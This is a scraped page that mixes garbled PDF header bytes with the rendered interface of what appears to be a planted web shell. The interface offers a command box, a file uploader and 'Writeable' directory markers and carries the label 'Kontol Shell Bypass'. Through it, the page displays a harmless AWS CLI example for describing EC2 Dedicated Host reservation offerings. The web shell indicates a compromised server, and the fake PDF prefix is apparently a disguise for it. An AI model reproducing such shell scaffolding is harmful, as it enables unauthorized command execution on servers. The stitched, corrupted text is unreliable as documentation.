%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/ec2/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/ec2/describe-host-reservation-offerings.rst
**To describe Dedicated Host Reservation offerings**

This example describes the Dedicated Host Reservations for the M4 instance family that are available to purchase.

Command::

  aws ec2 describe-host-reservation-offerings --filter Name=instance-family,Values=m4

Output::

  {
    "OfferingSet": [
        {
            "HourlyPrice": "1.499", 
            "OfferingId": "hro-03f707bf363b6b324", 
            "InstanceFamily": "m4", 
            "PaymentOption": "NoUpfront", 
            "UpfrontPrice": "0.000", 
            "Duration": 31536000
        }, 
        {
            "HourlyPrice": "1.045", 
            "OfferingId": "hro-0ef9181cabdef7a02", 
            "InstanceFamily": "m4", 
            "PaymentOption": "NoUpfront", 
            "UpfrontPrice": "0.000", 
            "Duration": 94608000
        }, 
        {
            "HourlyPrice": "0.714", 
            "OfferingId": "hro-04567a15500b92a51", 
            "InstanceFamily": "m4", 
            "PaymentOption": "PartialUpfront", 
            "UpfrontPrice": "6254.000", 
            "Duration": 31536000
        }, 
        {
            "HourlyPrice": "0.484", 
            "OfferingId": "hro-0d5d7a9d23ed7fbfe", 
            "InstanceFamily": "m4", 
            "PaymentOption": "PartialUpfront", 
            "UpfrontPrice": "12720.000", 
            "Duration": 94608000
        }, 
        {
            "HourlyPrice": "0.000", 
            "OfferingId": "hro-05da4108ca998c2e5", 
            "InstanceFamily": "m4", 
            "PaymentOption": "AllUpfront", 
            "UpfrontPrice": "23913.000", 
            "Duration": 94608000
        }, 
        {
            "HourlyPrice": "0.000", 
            "OfferingId": "hro-0a9f9be3b95a3dc8f", 
            "InstanceFamily": "m4", 
            "PaymentOption": "AllUpfront", 
            "UpfrontPrice": "12257.000", 
            "Duration": 31536000
        }
    ]
  }

Kontol Shell Bypass